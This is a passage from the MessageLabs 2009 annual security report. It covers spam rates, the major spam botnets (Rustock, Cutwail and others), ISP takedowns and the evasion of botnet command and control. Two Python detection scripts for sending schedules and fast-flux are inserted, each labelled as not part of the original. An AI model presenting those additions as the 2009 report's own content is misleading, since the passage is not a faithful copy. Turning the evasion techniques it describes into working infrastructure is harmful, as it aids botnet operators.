MessageLabs Intelligence:

2009 Annual Security Report

Image generated by source code from Cutwail Botnet


>NETSKY
>EMAIL WORM
Discovered on 21 March 2004, this worm is still a present threat in email traffic today.

>PHISHING1
>SUBJECT: CONFIRM YOUR ONLINE ACCOUNT DETAILS
Phishing continues to be a serious problem, with many computer users finding it difficult to distinguish phishes from legitimate emails. There are several common “angles” of phishing attacks. Some, like this example, require the recipient to confirm their details, often under the guise of enhancing security.

>SEXDATING1
>SUBJECT: PAISSIRA
>TEXT/HTML SPAM
Starting in late 2007, this spam run promoted “adult dating” or “extreme dating” websites. The content of the spam, and the website that it links to, are usually very explicit and could cause considerable offence.

>CUTWAIL
>INSTALLER TROJAN
CUTWAIL, also known as PUSHDO and PANDEX, is currently one of the world’s largest botnets, controlling more than one million active bots.

>CIMUZ
>INFORMATION-STEALING TROJAN
CIMUZ is an information-stealing Trojan that hooks itself into Internet Explorer. By capturing information entered or saved by the user, including passwords, keystrokes and other confidential information, it transmits the harvested data to its controller. It also terminates security software and unlocks firewalls, leaving the computer vulnerable to further attacks.

>STORM
>MALWARE
>AKA: STORMWORM, NUWAR AND ZHELATIN
STORM is one of the names for the aggressively spreading malware also known as STORMWORM, DORF, PEACOMM, NUWAR and ZHELATIN. It enabled the formation of one of the largest botnets in history, once estimated at two million compromised computers around the world.

>TT.PDF
>TARGETED TROJAN
TT.PDF is a PDF attached to an email that does not contain any real content. If opened, a message is displayed stating that the document is damaged and is being repaired. The document viewer may then crash as malicious code is written to disk and executed. The first thing the code does is display another PDF with the expected content, in order to cover its tracks.

>DEGREESDIPLOMA5
>SUBJECT: INTERESTED TO OBTAIN BACHELORS’ DEGREES
>TEXT SPAM
This type of spam run is quite common, promoting degrees from “degree farms” or “prestigious non-accredited universities”. The spam often includes phone numbers instead of URLs. These phone numbers are usually just voicemail boxes, where a long greeting explains the offer, and interested people are then invited to leave their details.

>GHOST
>KEYLOGGER
Keyloggers are a particularly dangerous type of security threat. They save all keystrokes on the computer to a file for later use. Ghost is even more advanced, as it also saves screenshots and the addresses of websites visited. This extra information makes it easy to identify which sites the captured passwords belong to and then carry out fraudulent activity using those accounts.

>TODYNHO
>INFORMATION-STEALING TROJAN
TODYNHO is an information-stealing Trojan originating from Brazil that steals a victim’s bank account details. The name TODYNHO was taken from the name of the email attachment.

>HUIGEZI
>TARGETED TROJAN
HUIGEZI is a targeted Trojan dropped via a PDF exploit. It spies on audio and video communications, in addition to web, email, IM and others. It is most commonly used for industrial espionage.

>PHISHING9
>SUBJECT: FOR YOUR SECUIRTY WE DEACTIVATED YOUR CARD ACCOUNT
Some phishes take the approach of claiming that the recipient’s bank account or credit card has been suspended, ostensibly due to fraudulent activity. To unlock or reactivate the account, the unsuspecting user is duped into entering their details, giving them directly to the phisher.

CONTENTS
1. Executive Summary and Overview 5
2. At A Glance: 2009 in Review 6
3. Spam: Top Threats of 2009 7
3.1. Spam Summary 7
3.2. Brazen Botnets: Lessons Learned From McColo and the Botnet Evolution 7
3.3. How Events in 2009 and Celebrity News Shaped the Spam Landscape 13
3.4. Spam and the Importance of CAPTCHAs 16
3.5. Spam Tactics Including Free Services, Image Spam and Shortened URLs 17
3.6. The Language of Spam 23
3.7. Spam Predictions for 2010 29

4. Malware: Top Threats of 2009 30
4.1. Malware Summary 30
4.2. Themed Malware Attacks: Email Bourne on the Fourth of July 30
4.3. Targeted and Semi-Targeted Attacks 31
4.4. The Rise of Generic Droppers: Downadup/Conficker 34
4.5. Bredolab Trojans Delivered by Cutwail Botnet 35
4.6. The Rise of Malicious Websites, New Malware & Toolkits 37
4.7. Instant Messaging Threats 47
4.8. Malware Predictions for 2010 49

5. Fraud, Scams and Phishing: Top Threats of 2009 51
5.1. Phishing Summary 51
5.2. New Techniques, Tactics, Changes etc. 51
5.3. Phishing Predictions for 2010 54
5.4. Advanced-Fee Fraud and the 2010 Soccer World Cup 54
5.5. Policy-Based Controls and the Enemy Within 54

6. Global and Business: Top Threats of 2009 57
6.1. Exposure to Cyber Threats – Likelihood of Joining a Botnet 57

7. Conclusions 59

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

1. EXECUTIVE SUMMARY AND OVERVIEW


Welcome to this 2009 annual security report in which we review the threat landscape over
the last year. 2009 was a tough year for businesses around the globe with no respite from
cyber criminals who generated an influx and variation of spam and malware that many
traditional security technologies were ill-equipped to handle.
In this report we take a closer look at the major factors and key developments over the
course of the year and their impact on the security landscape, looking ahead to 2010 to
provide insight into key threats and areas of concern. The key points to note from this report
include the following:
• The MessageLabs Intelligence report for 2009 highlights turbulent spam activity throughout the year, with average spam levels reaching 87.7%, but with a high of 90.4% in May and a low of 73.3% in February. With compromised computers issuing 83.4% of the 107 billion spam messages distributed globally per day on average, the shutdown of botnet-hosting ISPs such as McColo in late 2008 and Real Host in August 2009 appeared to make botnet operators re-evaluate and enhance their command-and-control backup strategy, so that recovery now takes hours rather than weeks or months. It is predicted that in 2010 botnets will become more autonomous and intelligent, with each node containing inbuilt self-sufficient code in order to coordinate and extend its own survival.
• Botnets continued to rule the cyber security landscape in 2009, with the ten major heavyweight spam-sending botnets, including Cutwail, Rustock and Mega-D, now controlling at least five million compromised computers. Cutwail was a dominating force across both spam and malware in 2009, responsible for issuing 29% of all spam, or 8,500 billion spam messages, between April and November 2009. Cutwail also used its strength to spam out emails containing the Bredolab Trojan dropper, disguised in the form of a .ZIP file attachment.
• One of the major threats of 2009, the Bredolab Trojan, was designed to give the sender complete control of the target computer, which could then be used to deploy other botnet malware, adware or spyware onto the victim’s computer. The percentage of spam distributing the Bredolab Trojan dropper increased steadily in late 2009 and reached its highest levels in October 2009, when it was estimated that approximately 3.6 billion Bredolab malware emails were in circulation.
• In 2009, 90.6% of spam contained a URL, or hyperlink, driven predominantly by an upsurge in the second half of the year in the use of shortened URLs in spam runs, which helped disguise the true website the user would be visiting and made it harder for traditional anti-spam filters to identify the messages as spam. URL shortening was frequently used on social networking and micro-blogging sites and is popular among online criminals because of the inherent trust relationships that exist between users of these sites.
• Other than the global credit crisis, world events, festivities and news stories also contributed to many spam themes in 2009, including St. Valentine’s Day, the H1N1 flu pandemic and the deaths of celebrities including singer Michael Jackson and actor Patrick Swayze. Malware writers and even 419-type advance-fee fraud campaigners also got in on the act. For example, in the days following the death of Michael Jackson we saw Brazilian banking Trojans distributed via malicious hyperlinks.
• Finally, CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart) came under increased scrutiny this year as CAPTCHA-breaking tools were readily traded in the underground economy, allowing cyber criminals to create large numbers of real accounts for webmail, instant messaging and social networking websites. There has been an emergence of businesses that specialize in providing real people to create real accounts on major webmail services on a 24-hour basis. Often advertised as a data-processing job, each worker can expect to receive approximately two to three U.S. dollars per 1,000 accounts created; the accounts are then sold on to spammers for around $30 to $40. Some major sites are already investigating alternatives to the swirling letters and numbers, such as large libraries of photographic images, in which the user must analyze or interact with the image in a way that would be very challenging for a computer program.

2. AT A GLANCE: 2009 IN REVIEW

Threat landscape: detected by MessageLabs Services

Total malware variants: 73 million
Spam botnet machines: 5 million
Spam stopped: 60 billion
Unique domains hosting malware: 30 thousand

2009 email spam intercepted

Global spam rate: 87.7% (global spam estimate: 107 billion messages per day)
Top 5 geographies: Denmark 88.2%; Hong Kong 87.6%; France 87.4%; China 86.9%; Norway 86.2%
Top 5 verticals: Engineering 87.7%; Education 86.3%; Marketing/Media 86.3%; Retail 86.0%; Manufacturing 85.8%
By horizontal (organization size): 1-250 84.0%; 251-500 84.0%; 501-1000 84.9%; 1001-1500 84.0%; 1501-2.5K 85.5%; 2.5K+ 84.2%

2009 email virus intercepted

Global virus rate: 1 in 286.4 emails
Top 5 geographies: Luxembourg 1 in 112.2; China 1 in 173.3; Brazil 1 in 188.3; United Kingdom 1 in 199.2; Germany 1 in 225.8
Top 5 verticals: Education 1 in 119.2; Gov/Public Sector 1 in 147.8; Accom/Catering 1 in 166.8; Marketing/Media 1 in 214.2; Engineering 1 in 242.1
By horizontal (organization size): 1-250 1 in 217.8; 251-500 1 in 227.7; 501-1000 1 in 218.4; 1001-1500 1 in 254.1; 1501-2.5K 1 in 181.9; 2.5K+ 1 in 244.5

2009 web malware and business risks

New sites with malware: 2,465 per day
[Chart: websites blocked for hosting malicious content and spyware per day, January to November 2009, split into new sites with web viruses and new sites with spyware; scale 500 to 4,000 per day.]

3. SPAM: TOP THREATS OF 2009


3.1. Spam Summary
In 2009, the annual average spam rate was 87.7%, an increase of 6.5 percentage points on the 2008 annual average of 81.2%. April saw a spike in image spam, which accounted for 56.4% of all spam on 5 April, compared with the annual average of 28.2%.
The global spam trend for 2009 shows a sharp increase in the early half of the year following
the sharp drop in spam volumes experienced toward the end of 2008, following the closure
of McColo.

[Chart: 2009 spam rate 87.7%; minimum in February 73.3%; maximum in May and June 90.4%. The same top 5 geographies, top 5 verticals and horizontals as in the At A Glance summary are shown (Denmark 88.2%, Hong Kong 87.6%, France 87.4%, China 86.9%, Norway 86.2%; Engineering 87.7%, Education 86.3%, Marketing/Media 86.3%, Retail 86.0%, Manufacturing 85.8%; 1-250 84.0%, 251-500 84.0%, 501-1000 84.9%, 1001-1500 84.0%, 1501-2500 85.5%, 2501+ 84.2%). Annual averages for 2005 to 2009 are also plotted: 81.2% for 2008 and 87.7% for 2009 (January to November), with values of 84.1%, 85.3% and 86.2% among 2005 to 2007.]

3.2. Brazen Botnets: Lessons Learned From McColo and the Botnet Evolution
By the end of 2009, 83.4% of spam originated from botnets, or “robot networks,” as
opposed to approximately 90% of spam that was sent from botnets in 2008. Botnets are
groups of semi-autonomous compromised computers that are all under the control of
cyber criminal organizations. Each botnet varies in size and may contain thousands, tens of
thousands, or even millions of computers that will receive instructions from command and
control channels. Botnets can be very flexible and are often used for a variety of criminal
activities, including distributed denial-of-service (DDoS) attacks, hosting websites and
sending spam emails.
Much of the remainder of spam not sent from botnets originated from compromised mail
servers and webmail accounts created using CAPTCHA-breaking tools.
The sharp drop in spam at the end of 2008 was a result of the widely reported demise of
California-based ISP, McColo in November 2008, after criminal botnet activity was reported
on its networks. In figure 1, it can be seen that after the demise of McColo, it took several
weeks for spam levels to rise again and months, before botnet controllers were able to
return to the same spam volumes as before the ISP was disconnected.
[Chart: spam volume from 25 October 2008 to 31 January 2009, indexed to the average prior to the McColo disconnection (100%). The disconnection produced an 80% drop, to around 20% of the prior average, before volumes returned to the prior level.]

Figure 1: Impact of McColo disconnection

As a result of McColo’s shutdown, one major botnet, Srizbi, completely faded away. Srizbi
until November 2008 had been responsible for as much as 50% of all botnet-related spam.
This left a huge gap in the spam-sending botnet market, which was soon filled by other rival
botnets, including Mega-D (aka Ozdok), Cutwail (aka Pandex) and Rustock. Rustock already
had a large number of bots under its control, but its spam-sending activities had been more
irregular than some other botnets. New botnets came onto the scene in 2009, perhaps to
capitalize on the shift in supply and demand; spammers still wanted to send spam, but the
major botnet resources were simply not available.
By May 2009, spam levels were already exceeding the peaks experienced in 2008. The
dominant botnets at this time had evolved and were by now much more technically
sophisticated, harder to detect and less susceptible to disruption.
3.2.1. Harnessing The Power of Botnets
With approximately 89.5 billion unsolicited messages each day being distributed by
compromised computers, understanding who is responsible is always of interest as, much
like the threat landscape, the botnet landscape is ever changing.
Figure 2 highlights the current botnet landscape, outlining which botnets are responsible for
the most spam, or have the largest number of compromised computers under their power.
It is also worth noting that there are two newcomers to this table in 2009, notably Maazben
and Festi.
Botnet                   % of spam   Spam per day       Spam per minute   Spam per bot per minute   Estimated botnet size   Top countries of infection
Rustock                  19%         20,191,511,739     14,021,883        91                        540k to 810k            Brazil (21%), USA (9%), Poland (7%)
Cutwail                  17%         18,417,396,993     12,789,859        59                        1100k to 1600k          Vietnam (17%), Rep. Korea (12%), Brazil (10%)
Bagle                    16%         17,334,321,383     12,037,723        37                        520k to 780k            Brazil (12%), Spain (9%), USA (9%)
Bobax                    14%         14,589,066,047     10,131,296        49                        100k to 160k            Spain (12%), Italy (7%), India (7%)
Grum                      9%          9,687,625,087      6,727,517       307                        580k to 860k            Vietnam (18%), Russia (17%), Ukraine (8%)
Maazben                   2%          2,161,829,037      1,501,270        93                        240k to 360k            Romania (17%), Brazil (11%), Saudi Arabia (7%)
Festi                     1%          1,353,086,645        939,644        53                        140k to 220k            Vietnam (31%), India (11%), China (5%)
Mega-D                    1%            996,079,588        691,722        46                        50k to 70k              Vietnam (14%), Brazil (11%), India (6%)
Xarvester                 1%            885,682,360        615,057       155                        20k to 36k              Brazil (15%), Poland (11%), USA (10%)
Gheg                      0%            436,044,470        302,809        22                        50k to 70k              Brazil (15%), Poland (8%), Vietnam (8%)
Unclassified botnets      3%          2,994,054,378      2,079,204        65                        120k to 180k
Other, smaller botnets    0%            439,986,486        305,546        47                        130k to 190k
Total botnet spam        83%         89,486,684,212     62,143,531        85                        3600k to 5400k          Brazil (13%), Vietnam (7%), USA (6%)
Non-botnet spam          17%         17,827,092,771     12,379,926
Grand total             100%        107,313,776,983     74,523,456

(Percentages are rounded to whole numbers, so botnets contributing under 0.5% of spam show as 0%.)

Figure 2: Top botnets at the end of 2009

General
• The largest single-day share of spam from any one botnet in 2009 belonged to Mega-D:
shortly after the demise of McColo, its output peaked at 58.3% of global spam on
1 January 2009. Next highest was Cutwail, which was linked to 46.5% of all spam on
14 May 2009. Third highest was Rustock, which generated 28.6% of global spam on
21 October 2009.
• During 2009, Bagle managed to quadruple the number of bots under its control as
well as its output, as it climbed into the top-3 most heavyweight botnets, based on
percentage of spam, by the end of the year.
Rustock
• Rustock climbed into the top spot at the end of 2009, but had been consistently
among the top 5 botnets based on the percentage of spam distributed throughout
2009. Rustock had frequently taken the approach to send spam at full capacity for
short periods, followed by longer periods of silence, often for days at a time.
• Between August and September 2009, Rustock had between 1.3 million and 2 million
active bots under its control.
• Rustock’s peak spam-sending period for 2009 was between October and November
2009. At that time, Rustock was sending almost three times as much spam per
minute than it had sent in January.
• Rustock had accounted for approximately 10-20% of all spam for much of the year,
but by the end of 2009 it had increased its dominance and stabilized its output at
approximately 18% of all spam.
• By the end of 2009, Rustock was mostly sending pharmaceutical and medical
spam.
Cutwail
• Cutwail was always listed in the top-3 spam-sending botnets throughout 2009, and
was comparable in size to Rustock. Both Cutwail and Rustock were unrivalled in
terms of their size.
• Cutwail retained between 1 million and 1.5 million bots throughout the year.
Botnets frequently experience a turnover of bots over time, and in order to
maintain this level of control, Cutwail had been aggressive in its recruitment.
• Cutwail was linked to the surge in Bredolab malware, and frequently linked to
spoofed greetings card emails containing malicious hyperlinks.
• In 2009, Cutwail was frequently linked to phishing activities, and pharmaceutical
spam and spam touting counterfeit watches.
• Cutwail had its peak of spamming activity between April and June 2009, when it
had sent more than double the volume of spam of rival botnets and was linked
to 46.5% of all spam. By the end of the year, Cutwail had the 2nd largest output
behind Rustock, linked with approximately 17% of all spam.
Bagle
• Bagle grew from between 100,000 and 200,000 bots in January 2009 to between
600,000 and 800,000 bots by the end of the year. This represents a four-fold
growth in the number of bots under its control, consistent with its four-fold
increase in spam output over the same period.
• By the end of 2009, Bagle was responsible for approximately 16% of global spam,
just behind Cutwail and Rustock.
• Bagle was almost exclusively sending pharmaceutical or medical spam by the end
of 2009.
Bobax (aka Kraken)
• Bobax, like Bagle, increased its output over 2009, barely registering in the top
10 botnets in January and rising to 4th place by the end of the year. The number
of bots involved in sending spam did not increase significantly, remaining at an
estimated 80,000 to 120,000; instead, Bobax increased the rate at which each bot
was sending spam.
• Compared with its output in January, Bobax was sending approximately ten times
more spam by the end of the year and accounted for approximately 13% of spam,
behind Rustock, Cutwail and Bagle.
• By the end of 2009, Bobax had returned to its pre-McColo spam levels, taking
over a year to recover from the disruption. It was mostly sending spam relating to
counterfeit fashion accessories and watches.
Grum
• Grum steadily increased its output during 2009, with its busiest period between
June and September; during September it sent more spam than any other botnet,
accounting for approximately 20% of all spam.
• Grum had an estimated 600,000-800,000 bots under its control by the end of
2009, responsible for sending approximately 9% of all spam, predominantly
pharmaceutical in nature.
Maazben
• This new botnet appeared around March 2009 and has not really asserted itself
despite a surge of spam during September and October when it was responsible for
as much as 3% of all spam.
• With approximately 200,000-300,000 bots under its control, Maazben was
responsible for approximately 2% of all spam by the end of 2009, sending mostly
French and German language casino related and gambling spam.
Festi
• Another new botnet that emerged as part of the botnet landscape in August 2009.
It underwent a large increase in output during late October and early November
2009, but has since returned to approximately 1% of spam.
• By the end of 2009, Festi comprised an estimated 100,000-200,000 bots and was
mostly responsible for counterfeit watch spam and fake fashion accessories.
Mega-D
• At the start of 2009, Mega-D was the main spamming botnet, emerging after the
McColo closure as the most active botnet with an estimated 300,000-500,000 bots.
However, as the year progressed, Mega-D seemed to be seriously hemorrhaging bots,
and its estimated size plummeted to less than 100,000. In response, Mega-D seemed
to command each of its bots to send more and more spam, in order to sustain its
overall level of output.
• In terms of spam output, Mega-D showed a gradual decline throughout 2009 as it
lost more and more bots, from a high in January when 58.3% of spam originated
from Mega-D.
• Almost eradicated on 4 November 2009 as the result of community action to
disrupt the botnet, spam from Mega-D fell to approximately 1% of all spam. Mega-D
returned on 13 November using a different collection of bots, sending between
4-5% of spam.
• By the end of 2009, Mega-D was sending mostly pharmaceutical spam and some
phishing activity.
Xarvester
• At the start of 2009, Xarvester was heralded as the heir to the already defunct
Srizbi botnet, as it launched the year with an onslaught of spam. Xarvester was
widely believed to be designed and operated by the owners of the ill-fated Srizbi
botnet, and the security community paid it close attention, resulting in a lot of
activity to suppress Xarvester’s operation. By March, Xarvester’s output had faded,
and throughout the rest of 2009, it never recovered.
• Although Xarvester had been responsible for sending a lot of spam in 2009, it
did not become the giant that everyone expected after it first appeared in
January, when it had an estimated 500,000-800,000 bots under its control and was
responsible for more than 32.1% of all spam on 3 January.
• By the end of 2009, Xarvester had an estimated 20,000-36,000 bots, and was
responsible for less than 1% percent of all spam; sending mostly pharmaceutical
and medical spam.
Gheg
• Like Xarvester, Gheg was very strong in January, sending approximately 5% of all
spam. With an estimated 150,000-200,000 bots following the closure of McColo,
its output generally faded during the rest of the year, falling to less than 100,000
bots by the end of the year and linked to approximately 0.5% of all spam, mostly
Russian language dating spam, and medical spam in French, German and English.
Donbot
• Although not featured in the list of top spam-sending botnets at the end of 2009,
Donbot had been an important feature of the botnet landscape in 2009. Donbot
appeared in the wake of the McColo closure and underwent an almost exponential
rise in output during the first quarter of 2009. Donbot was the number one botnet
at the start of the year, but gradually faded. However, it returned to large scale
spamming in July and August, and latterly in November when it was associated
with spam containing links to profiles on social networking and micro-blogging
websites.
• At its peak of activity during the first quarter of 2009, Donbot comprised an
estimated 800,000 to 1.2 million bots, falling to an estimated 100,000-150,000 by
the end of the year.
• By the end of the first quarter 2009, Donbot was responsible for approximately
17% of all spam falling to less than 0.5% towards the end of the year. During
November, Donbot was able to generate between 5-10% of spam, containing
hyperlinks related to social networking and micro-blogging accounts, related to
“make-money-working-at-home” type spam messages.

Figure 3: Descriptions of top botnets in 2009

[Chart: monthly share of all spam attributed to each of the top botnets, September 2008 to November 2009, on a 0% to 100% scale. Series: Donbot, Festi, Xarvester, Maazben, Gheg, Rustock, Grum, Srizbi, Mega-D, Cutwail, Bobax, Bagle.]

Figure 4: Contribution of Top 10 botnets to spam in 2009
3.2.2. Cutwail: Botnet Business as Usual
The Cutwail botnet is among the oldest of botnets. Malware linked to the Cutwail botnet was
first identified in January 2007. With between one and two million compromised computers
under its control, Cutwail was perhaps the largest botnet in history at its peak. Cutwail has
been very active in spamming out emails containing the Bredolab Trojan dropper, which
in turn has been used to deploy other botnet malware, adware and spyware onto victims’
computers. Bredolab is discussed in more detail in the malware section of this report.
Cutwail experienced several hours of downtime on the morning of 5 June 2009, following
another ISP shutdown earlier that week, this time initiated by the U.S. Federal Trade
Commission. California-based ISP Pricewert LLC (also known as 3FN and APS Telecom)
allegedly engaged in the deployment of botnets and the distribution of illegal, malicious and
harmful content such as spam and exploitative images of children. This time, however, the
Cutwail botnet was able to recover after only a few hours, highlighting the progress that
spammers had made since McColo’s shutdown just seven months earlier. Clearly, spammers
were learning the importance of having a proper backup strategy for their command and
control channels.
Spammers demonstrated this again when Real Host, an ISP based in Riga, Latvia and al-
leged to be linked to command-and-control servers for infected botnet computers, as well as
responsible for malicious websites, phishing websites and “rogue” anti-virus products, was
disconnected by its upstream providers on 1 August 2009. The impact was felt immediately,
as spam volumes dropped briefly by as much as 38% in the subsequent 48-hour period.
Much of this spam was linked to the Cutwail botnet which, at the time was responsible for
approximately 15-20% of all spam. Cutwail’s activity levels fell by as much as 90% when
Real Host was taken offline, but quickly recovered in a matter of days.
3.2.3. Regular Rustock: The Botnet with a Heartbeat
Analysis of the Rustock botnet in the latter part of 2009 revealed some interesting insights
into how it settled into a remarkably predictable pattern of spamming. Every day at
0800 GMT (0300 EST) it began distributing spam emails, continuing throughout the day,
peaking at about 1200 GMT (0700 EST) and ceasing at 2400 GMT (1900 EST). It then
rested for about eight hours before the cycle began again the following day.
As Rustock was one of the most dominant botnets during 2009, responsible for as much
as 19.3% of all spam by the end of the year, the same regular pattern could be observed in
total daily spam patterns for all spam.

[Chart: Rustock daily spam volume over one week, Mon 07 to Sun 13, on a scale of 600 million to 3.6 billion messages per day.]

Figure 5: Rustock – lifecycle of activity


This regular pattern of spamming for Rustock began in July 2009. Prior to that, Rustock
was spamming in much bigger bursts, but less frequently, roughly two weeks on followed by
two weeks off. Following this trend later in the year, the Bobax botnet began spamming in
regular 10 minute intervals, with very high volume bursts, approximately once every hour.
This pattern began on Friday 13 November.
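The daily window and the hourly bursts described above are the kind of regularity an analyst can measure directly from intercept timestamps. The following is an added example, not MessageLabs code, that profiles a sender's activity from a list of message timestamps: a per-hour-of-day histogram exposes the rest period, and a minute-level autocorrelation exposes a repeating burst cadence. The timestamps are constructed to imitate the two patterns in the text; the volumes, the three-day window and the 5% quiet threshold are assumptions.

```python
"""Sender activity profiling: find a botnet's daily duty cycle and any short
periodic burst cadence from the timestamps of intercepted spam.

Added illustration; not MessageLabs code. Sample data is constructed."""
from collections import Counter
from datetime import datetime, timedelta, timezone
import random

UTC = timezone.utc


def make_sample(days=3, seed=1):
    """Constructed sample timestamps (UTC), one list per behaviour.

    'daily' mimics the Rustock pattern in the text: sending from 08:00 to
    24:00, busiest around midday, silent for the remaining eight hours.
    'bursty' mimics the Bobax pattern: a ten-minute burst at the top of
    every hour and only a trickle in between. Volumes are invented."""
    rnd = random.Random(seed)
    start = datetime(2009, 11, 9, tzinfo=UTC)  # arbitrary Monday
    daily, bursty = [], []
    for minute in range(days * 24 * 60):
        t = start + timedelta(minutes=minute)
        if t.hour >= 8:
            n = 20 + (10 if 11 <= t.hour < 14 else 0) + rnd.randint(0, 5)
            daily.extend([t] * n)
        n = 50 if t.minute < 10 else rnd.randint(0, 2)
        bursty.extend([t] * n)
    return daily, bursty


def hourly_profile(timestamps):
    """Messages per UTC hour of day, summed over every day observed."""
    counts = Counter(t.hour for t in timestamps)
    return [counts.get(h, 0) for h in range(24)]


def quiet_hours(profile, fraction=0.05):
    """Hours carrying less than `fraction` of the busiest hour's volume.

    A contiguous run of these is the sender's rest period; for a botnet it
    points to a scheduled campaign rather than organic mail flow."""
    peak = max(profile)
    return [h for h, c in enumerate(profile) if c < fraction * peak]


def minute_series(timestamps):
    """Messages per minute from the first to the last timestamp."""
    first = min(timestamps).replace(second=0, microsecond=0)
    last = max(timestamps).replace(second=0, microsecond=0)
    series = [0] * (int((last - first).total_seconds() // 60) + 1)
    for t in timestamps:
        series[int((t - first).total_seconds() // 60)] += 1
    return series


def dominant_period(series, min_lag=5, max_lag=180):
    """Lag in minutes at which the mean-removed series best matches a shifted
    copy of itself (unnormalised autocorrelation). A clear winner at 60 means
    the sender works on an hourly cadence."""
    n = len(series)
    mean = sum(series) / n
    x = [v - mean for v in series]
    best_lag, best_score = None, float("-inf")
    for lag in range(min_lag, min(max_lag, n // 2) + 1):
        score = sum(x[i] * x[i + lag] for i in range(n - lag))
        if score > best_score:
            best_lag, best_score = lag, score
    return best_lag


if __name__ == "__main__":
    daily, bursty = make_sample()
    print("daily sender rests during UTC hours:", quiet_hours(hourly_profile(daily)))
    print("bursty sender repeats every", dominant_period(minute_series(bursty)), "minutes")
```

On the constructed data the daily sender is quiet for hours 0 to 7 and peaks between 11:00 and 13:59, and the bursty sender's strongest self-similarity is at a lag of 60 minutes. Run on real intercept timestamps, the same two measures separate a scheduled botnet campaign from the irregular flow of legitimate mail.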

3.2.4. Command and Control: Mysterious Messages and Covert Channels


In the 12 months since the McColo ISP was taken offline, the Trojan technology behind
botnet-oriented malware has improved, with rootkit-type kernel drivers becoming the
norm. A rootkit is a set of software tools or services that enable an attacker to hide the fact
that a computer has been compromised.
The command and control (C&C) mechanisms have also evolved, making it harder to disrupt
a botnet, shifting more towards HTTP and away from IRC (Internet Relay Chat). With
increased use of “bullet-proof” hosting and fast-flux domain name services, more command
and control channels will rely on HTTP as the protocol of choice.
“Bullet-proof” services often rely on domain registrars that are resistant to notice-and-
takedown requests, and as such these services are likely to remain available much longer than
those hosted by mainstream providers. So-called bullet-proof services may also make use of
fast-flux, a DNS technique used to conceal the addresses of the websites that host
malware, spam and phishing content. The websites are hidden behind a continually changing
list of IP addresses of compromised computers acting as web servers or web proxies, making
the botnet’s infrastructure more difficult to disrupt. The now-defunct Storm botnet was one
of the earliest botnets to use this technique.
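Fast-flux leaves a measurable fingerprint in DNS: a name that, over repeated lookups, resolves to many addresses spread across many networks, each advertised with a short TTL so that the pointer can move before a takedown catches up. The following is an added example, not code from the report, showing one way to score a name from its lookup history. The lookup histories are constructed; the /16 prefix stands in for the ASN lookup a production check would use, and the thresholds are assumptions to be tuned on real passive-DNS data.

```python
"""Fast-flux heuristic: score a hostname from repeated DNS lookups.

Added illustration, not MessageLabs code. The lookups are constructed; in
practice they come from resolving the name repeatedly or from passive DNS,
and the /16 prefix used here as a proxy for network diversity would be
replaced by an ASN lookup. Thresholds are assumptions, not report figures."""
import ipaddress
from collections import namedtuple

# One DNS answer: TTL in seconds and the A records returned.
Lookup = namedtuple("Lookup", "ttl addresses")


def network_of(ip, prefix=16):
    """Coarse network key for an address (a /16 here; an ASN would be better)."""
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def flux_features(lookups):
    """What repeated lookups reveal: distinct addresses, distinct networks,
    the shortest TTL seen and the churn (addresses absent from the previous
    answer). A flux network rotates compromised hosts in and out, so all
    four climb together; a CDN has short TTLs but stays within a few
    networks; a static host changes nothing."""
    ips, nets, prev, churn = set(), set(), None, 0
    for lk in lookups:
        cur = set(lk.addresses)
        ips |= cur
        nets |= {network_of(ip) for ip in cur}
        if prev is not None:
            churn += len(cur - prev)
        prev = cur
    return {
        "unique_ips": len(ips),
        "unique_nets": len(nets),
        "min_ttl": min(lk.ttl for lk in lookups),
        "churn": churn,
    }


def is_fast_flux(lookups, min_ips=10, min_nets=5, max_ttl=600):
    """Flag a name that spreads many addresses over many networks with
    short TTLs. The cut-offs are assumed; tune them on your own data."""
    f = flux_features(lookups)
    return (f["unique_ips"] >= min_ips
            and f["unique_nets"] >= min_nets
            and f["min_ttl"] <= max_ttl)


def constructed_samples():
    """Three made-up lookup histories: a flux domain whose every answer is
    five fresh addresses in five different /16s, a CDN-fronted site rotating
    three addresses in one /24, and a single static host."""
    flux = [
        Lookup(180, [f"{(17 * i + 5 * j) % 200 + 20}.{(31 * i + 7 * j) % 256}"
                     f".{(i * j) % 256}.{j + 1}" for j in range(5)])
        for i in range(6)
    ]
    cdn = [
        Lookup(300, ["203.0.113.10", "203.0.113.11"]),
        Lookup(300, ["203.0.113.11", "203.0.113.12"]),
        Lookup(300, ["203.0.113.12", "203.0.113.10"]),
        Lookup(300, ["203.0.113.10", "203.0.113.11"]),
    ]
    static = [Lookup(3600, ["198.51.100.7"])] * 4
    return flux, cdn, static


if __name__ == "__main__":
    for name, history in zip(("flux", "cdn", "static"), constructed_samples()):
        print(name, flux_features(history), "fast-flux" if is_fast_flux(history) else "ok")
```

The CDN case is why TTL alone is not enough: it rotates addresses with a 300-second TTL just as a flux network would, but never leaves a single network. Network (ideally ASN) diversity is the discriminating feature, because the flux layer is built from compromised consumer machines scattered across many providers.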
As predicted, Web 2.0 provided a good environment for contextual malware that was able
to consolidate multiple data streams from diverse unrelated sources, creating a malicious
environment. Examples of this included the application of public services such as social
networks and micro-blogging sites being used to host the command and control channels of
some botnet activities. In 2009 some examples of social networking [1] and micro-blogging [2]
environments being used to transmit botnet command and control instructions came to
light.
More examples are likely to manifest during 2010, as malicious instructions are likely to
be fragmented and concealed within ostensibly innocuous files, such as images and audio
content hosted on websites. These files will then be accessed remotely over HTTP and
reassembled on-the-fly to reconstruct the malicious code or instructions.
As more and more botnets made use of peer-to-peer (P2P) command and control during
2009, this helped to reduce the impact of having single points-of-failure, such as a single
rogue ISP.
P2P botnets use a mechanism where each member of the botnet has learned of the location
and identity of a number of other members of the same botnet, and information is shared
between them. Command and control instructions could then be issued to one botnet
member, which in turn are cascaded to the other members that it knows of. As instructions
are received, they are shared with other members along the chain, eventually reaching the
entire botnet. P2P communications are often encrypted or disguised as other legitimate
traffic, such as DNS or HTTP requests.
[1] http://www.symantec.com/connect/blogs/trojanwhitewell-what-s-your-bot-facebook-status-today
[2] http://www.symantec.com/connect/blogs/twittering-botnets

12

www.messagelabs.com
[email protected]
MESSAGELABS INTELLIGENCE

As we move into 2010, it is expected that botnets will become more autonomous or
artificially intelligent, perhaps even exhibiting the characteristics of swarm intelligence, where
each compromised computer will have built-in self-sufficient coding in order to coordinate
and extend its own survival. This will mean the botnet controllers will have more time to
focus on driving the bots’ use in spamming and other criminal activities, rather than dedicate
resources to extending the lifecycle of the botnet.
